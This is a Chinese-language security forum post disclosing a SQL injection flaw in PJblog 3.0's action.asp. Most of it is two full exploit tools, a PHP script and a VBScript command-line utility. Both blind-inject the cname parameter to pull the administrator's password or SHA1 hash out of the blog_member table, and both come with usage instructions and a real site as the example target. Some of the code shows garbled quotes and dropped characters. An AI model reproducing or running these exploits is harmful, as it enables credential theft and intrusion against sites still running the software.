影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行:
Vb 代码复制代码
-
strcname=request(“cname”)
-
set checkcdb=conn.execute(“select * from blog_Content where log_cname=”“”&strcname&“”“”)
Exp:
Php 代码复制代码
-
<?php
-
/*
-
PJblog V3.0 0day exp
-
code by 小蟑螂&bink
-
www.0kee.com www.t00ls.net
-
09.04.22
-
*/
-
$url=“http://www.pjhome.net”; //注入地址
-
$var_name=“puterjam”; //管理员
-
$var_key=“check_right”;
-
if ($_SESSION["LenI"]){
-
$LenI=$_SESSION["LenI"];
-
}else{
-
$LenI=1;
-
}
-
for($i=$LenI;$i<=40;$i++){
-
if($_SESSION["LenDo"]){
-
$StaAsc=$_SESSION["LenDo"];
-
}else{
-
$StaAsc=31;
-
}
-
echo “Scan password len:”.$i.“ ;asc form ”.$StaAsc.“ to 127″;
-
for($j=$StaAsc;$j<=127;$j++){
-
$newurl=$url.‘/action.asp?action=checkAlias&cname=firebug_plugins_firediff”%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c’.$i.‘%2c1%29%29%20From%20blog_member%20where%20mem_name=\”.$var_name.‘\’%29%3e’.$j.‘%20and%20″1″=”1′;
-
$var_pagelen=file_get_contents($newurl);
-
$var_newpagelen=strpos($var_pagelen,$var_key);
-
if($var_newpagelen == true){
-
$_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
-
unset($_SESSION["LenDo"]);
-
$_SESSION["LenI"]=$i+1;
-
doReload();
-
break;
-
}
-
if($j == $StaAsc+10){
-
doReload();
-
break;
-
}
-
}
-
}
-
if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }
-
function doReload(){
-
?>
-
<script language=“javascript”>
-
<!–
-
window.setTimeout(‘location.reload()’,1000);
-
//–>
-
</script>
-
<?php
-
}
-
?>
此文发布时官方已经打了补丁
雨中风铃的投递
漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
Vb 代码复制代码
-
If WScript.Arguments.Count <> 2 Then
-
WScript.Echo “Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名”
-
WScript.Echo “Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam”
-
WScript.Quit
-
End If
-
attackUrl = WScript.Arguments(0)
-
attackUser = WScript.Arguments(1)
-
attackUrl = Replace(attackUrl,“\”,”/“)
-
If Right(attackUrl , 1) <> ”/“ Then
-
attackUrl = attackUrl & ”/“
-
End If
-
SHA1Charset = ”123456789ABCDEFJ“
-
strHoleUrl = attackUrl & ”ction.asp?action=checkAlias&cname=0kee“”“
-
If IsSuccess(strHoleUrl & ”r “”1“”=“”1“) And Not IsSuccess(strHoleUrl & ”and “”1“”=“”2“) Then
-
WScript.Echo ”恭喜!存在漏洞“
-
Else
-
WScript.Echo ”没有检测到漏洞“
-
WScript.Quit
-
End If
-
For n=1 To 40
-
For i=1 To 17
-
strInject = strHoleUrl & ” Or 0<(Select Count(*) From blog_member Where mem_name=‘” & attackUser & ”‘ And mem_password>=’” & strResult & Mid(SHA1Charset, i, 1) & ”‘) And ”"1″”=”"1″
-
If Not IsSuccess(strInject) Then
-
strResult = strResult & Mid(SHA1Charset, i-1, 1)
-
Exit For
-
End If
-
strPrint = chr(13) & “Password(SHA1): ” & strResult & Mid(SHA1Charset, i, 1)
-
WScript.StdOut.Write strPrint
-
Next
-
Next
-
WScript.Echo Chr(13) & Chr (10) & “Done!”
-
Function PostData(PostUrl)
-
Dim Http
-
Set Http = CreateObject(“msxml2.serverXMLHTTP”)
-
With Http
-
.Open “GET”,PostUrl,False
-
.Send ()
-
PostData = .ResponseBody
-
End With
-
Set Http = Nothing
-
PostData =bytes2BSTR(PostData)
-
End Function
-
Function bytes2BSTR(vIn)
-
Dim strReturn
-
Dim I, ThisCharCode, NextCharCode
-
strReturn = “”
-
For I = 1 To LenB(vIn)
-
ThisCharCode = AscB(MidB(vIn, I, 1))
-
If ThisCharCode < &H80 Then
-
strReturn = strReturn & Chr(ThisCharCode)
-
Else
-
NextCharCode = AscB(MidB(vIn, I + 1, 1))
-
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
-
I = I + 1
-
End If
-
Next
-
bytes2BSTR = strReturn
-
End Function
-
Function IsSuccess(PostUrl)
-
strData = PostData(PostUrl)
-
‘Wscript.Echo strData
-
if InStr(strData,“check_error”) >0 then
-
IsSuccess = True
-
Else
-
IsSuccess = False
-
End If
-
‘Wscript.Sleep 500 ’让系统休息一下
-
End Function
用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名
截图如下:
本文还暂无回复